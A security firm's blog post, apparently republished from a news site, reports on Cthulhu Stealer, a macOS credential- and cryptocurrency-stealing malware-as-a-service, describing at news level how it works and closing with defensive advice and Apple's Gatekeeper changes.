Blog Details

  • Home
  • Blog
  • Cthulhu Stealer: New macOS Malware Targets Credentials and Cryptocurrency
Cthulhu Stealer: New macOS Malware Targets Credentials and Cryptocurrency

Cthulhu Stealer: New macOS Malware Targets Credentials and Cryptocurrency

Cybersecurity researchers have identified a new information-stealing malware targeting Apple macOS systems, highlighting the growing focus of threat actors on the operating system.

Known as Cthulhu Stealer, this malware has been offered as malware-as-a-service (MaaS) for $500 per month since late 2023. It can target both x86_64 and Arm architectures.

"Cthulhu Stealer is an Apple disk image (DMG) that is bundled with two binaries, depending on the architecture," said Tara Gould, a researcher at Cato Security. "The malware is written in Golang and disguises itself as legitimate software."

The malware impersonates several software programs, including CleanMyMac, Grand Theft Auto IV, and Adobe GenP—an open-source tool that bypasses Adobe's Creative Cloud service to activate apps without a serial key.

Users who execute the unsigned file, bypassing Gatekeeper protections, are prompted to enter their system password. This method, which relies on an osascript-based technique, is similar to that used by other malware like Atomic Stealer, Cuckoo, MacStealer, and Banshee Stealer.

The next step involves a prompt for the user's MetaMask password. Cthulhu Stealer also collects system information and extracts iCloud Keychain passwords using an open-source tool called Chainbreaker.

The stolen data, which includes web browser cookies and Telegram account information, is compressed into a ZIP file and then sent to a command-and-control (C2) server. "The main functionality of Cthulhu Stealer is to steal credentials and cryptocurrency wallets from various stores, including game accounts," Gould noted.

"The functionality and features of Cthulhu Stealer are very similar to Atomic Stealer, indicating the developer of Cthulhu Stealer probably took Atomic Stealer and modified the code. The use of osascript to prompt the user for their password is similar in Atomic Stealer and C

thulhu, even including the same spelling mistakes."

The threat actors behind Cthulhu Stealer are reportedly no longer active, partly due to disputes over payments that led to accusations of exit scams by affiliates. This resulted in the main developer being banned permanently from a cybercrime marketplace where the stealer was advertised.

Despite its capabilities, Cthulhu Stealer lacks sophisticated features such as anti-analysis techniques that would allow it to evade detection. It also does not have any standout features that distinguish it from other similar malware offerings in the cybercriminal underground.

Although macOS is less frequently targeted compared to Windows and Linux, users are advised to only download software from trusted sources, avoid installing unverified apps, and keep their systems updated with the latest security patches.

Apple has acknowledged the rise in macOS malware and recently announced updates to its operating system aimed at enhancing security. The next version, macOS Sequoia, will introduce more stringent checks when opening software that isn’t correctly signed or notarized.

"In macOS Sequoia, users will no longer be able to Control-click to override Gatekeeper when opening software that isn't signed correctly or notarized," Apple stated. "They'll need to visit System Settings > Privacy & Security to review security information for software before allowing it to run."

 

Reference: www.thehackernews.com

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067